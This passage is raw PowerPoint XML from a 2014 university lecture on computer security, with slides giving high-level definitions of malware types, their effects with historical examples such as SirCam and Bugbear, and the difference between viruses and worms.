              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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for today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lecture 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3200400" y="3810000"/>
            <a:ext cx="695325" cy="419100"/>
            <a:chOff x="6143624" y="2514600"/>
            <a:chExt cx="695325" cy="419100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="6143624" y="2514600"/>
              <a:ext cx="695325" cy="419100"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="19050"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11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6315838" y="2611083"/>
              <a:ext cx="491553" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                  <a:latin typeface="Tahoma"/>
                  <a:cs typeface="Tahoma"/>
                </a:rPr>
                <a:t>NEXT</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11635817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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42676588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Malicious code or Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trojan horses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29998286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Malicious code or Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viruses – propagates with help of other programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worms – self-contained programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trojan horses – pretends to do one thing; does another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoors – secret entry point into a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rootkit – hides the presence of other malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spyware – sends personal information to third party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adware – shows Ads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10612207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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effects of Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data loss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crash machines / Functional loss / Overload network infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>productivity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates “bots” to attack other systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loss of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SirCam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a random file on the disk to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>contacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. Bugbear sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the password stored by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97991769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Viruses &amp; Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>virus/work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a (malicious) program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(possibly modified) copies of itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>has other effects (deleting files, “jokes”, messages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Viruses cannot propagate without a “host”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>require some user action to activate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worms are self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-contained running programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Infection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>strategy more active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit vulnerabilities to propagate itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42561117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Virus/Worm Writer’s Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
